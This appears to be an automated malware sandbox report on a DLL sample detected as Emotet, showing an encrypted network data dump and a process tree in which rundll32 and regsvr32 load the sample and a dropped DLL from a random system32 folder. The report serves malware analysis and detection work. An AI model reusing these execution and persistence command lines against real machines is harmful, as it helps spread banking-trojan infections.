                                                                                                      2022-05-14 02:57:36 UTC0INData Raw: 31 35 64 0d 0a 81 1b 04 d1 44 fb 80 f4 b9 12 74 85 2b 7d 24 df 70 84 d5 88 7f 20 0f fc 69 82 cd 9a 39 e7 42 7f 50 d0 ca f5 0b 0a 2a e0 8f 0d af 76 7f f6 57 85 65 2e 1a e0 a2 c6 ca 6a 50 04 53 ab 87 9c 45 0c 90 75 b9 1b f1 61 6a 04 0e a7 75 7b f0 8f 87 f4 a3 64 50 d0 1e c8 b1 09 1c 84 73 2c ed c6 4b 6d ad fe 00 39 3f ec 67 b9 98 4a ee 4c f3 89 2f 9f 71 4b dc d6 98 bd ac 2d c2 ad ce f8 fd 8d 06 60 4e d1 65 49 74 83 a4 cd 0e a7 d2 2c 35 c9 7d 70 67 a9 f8 64 7b d1 37 d3 45 30 99 e0 1e 72 05 ba 8f ce 0b 0b b7 e5 b1 9c b8 39 9c 4b aa 30 54 7d 06 51 24 9c 6e 29 25 85 e0 23 c1 bd 9d 85 46 fd 66 fa 84 a3 70 4b ba b1 c1 92 53 d7 c1 f2 d7 e8 49 63 21 41 f9 f9 e9 39 35 96 a8 d5 a8 bb 35 e6 e0 09 47 a3 66 65 dd d8 94 c3 1e 2b 54 49 82 65 e6 cf 81 38 8a ff e2 f1 09 11
                                                                                                      Data Ascii: 15dDt+}$p i9BP*vWe.jPSEuaju{dPs,Km9?gJL/qK-`NeIt,5}pgd{7E0r9K0T}Q$n)%#FfpKSIc!A955Gfe+TIe8


                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:04:56:53
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\loaddll64.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:loaddll64.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll"
                                                                                                      Imagebase:0x7ff6d1740000
                                                                                                      File size:140288 bytes
                                                                                                      MD5 hash:4E8A40CAD6CCC047914E3A7830A2D8AA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:1
                                                                                                      Start time:04:56:53
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1
                                                                                                      Imagebase:0x7ff7bb450000
                                                                                                      File size:273920 bytes
                                                                                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:2
                                                                                                      Start time:04:56:54
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:regsvr32.exe /s C:\Users\user\Desktop\TSvDnT6fkE.dll
                                                                                                      Imagebase:0x7ff6c45e0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.286004356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.285867469.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:3
                                                                                                      Start time:04:56:54
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1
                                                                                                      Imagebase:0x7ff6a3250000
                                                                                                      File size:69632 bytes
                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.282888482.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.284635526.000001BF264F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:4
                                                                                                      Start time:04:56:54
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllRegisterServer
                                                                                                      Imagebase:0x7ff6a3250000
                                                                                                      File size:69632 bytes
                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.284149988.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.284298994.0000026C83780000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:5
                                                                                                      Start time:04:56:59
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllUnregisterServer
                                                                                                      Imagebase:0x7ff6a3250000
                                                                                                      File size:69632 bytes
                                                                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:6
                                                                                                      Start time:04:56:59
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LqleYRChPKuppQ\QMAA.dll"
                                                                                                      Imagebase:0x7ff6c45e0000
                                                                                                      File size:24064 bytes
                                                                                                      MD5 hash:D78B75FC68247E8A63ACBA846182740E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.665179652.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.664928171.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Target ID:7
                                                                                                      Start time:04:57:01
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                      Imagebase:0x7ff7338d0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:8
                                                                                                      Start time:04:57:02
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                      Imagebase:0x7ff7338d0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Target ID:9
                                                                                                      Start time:04:57:04
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                      Imagebase:0x7ff7338d0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:10
                                                                                                      Start time:04:57:05
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                      Imagebase:0x7ff7338d0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:11
                                                                                                      Start time:04:57:06
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                                      Imagebase:0x7ff763d20000
                                                                                                      File size:163336 bytes
                                                                                                      MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:12
                                                                                                      Start time:04:57:06
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                      Imagebase:0x7ff7338d0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:13
                                                                                                      Start time:04:57:09
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                      Imagebase:0x7ff7338d0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:15
                                                                                                      Start time:04:57:16
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                      Imagebase:0x7ff7338d0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:18
                                                                                                      Start time:04:57:42
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff7338d0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:20
                                                                                                      Start time:04:58:13
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                      Imagebase:0x7ff678970000
                                                                                                      File size:455656 bytes
                                                                                                      MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:21
                                                                                                      Start time:04:58:13
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff647620000
                                                                                                      File size:625664 bytes
                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:22
                                                                                                      Start time:04:58:15
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff7338d0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:26
                                                                                                      Start time:04:58:40
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff7338d0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      Target ID:29
                                                                                                      Start time:04:59:05
                                                                                                      Start date:14/05/2022
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff7338d0000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language

                                                                                                      No disassembly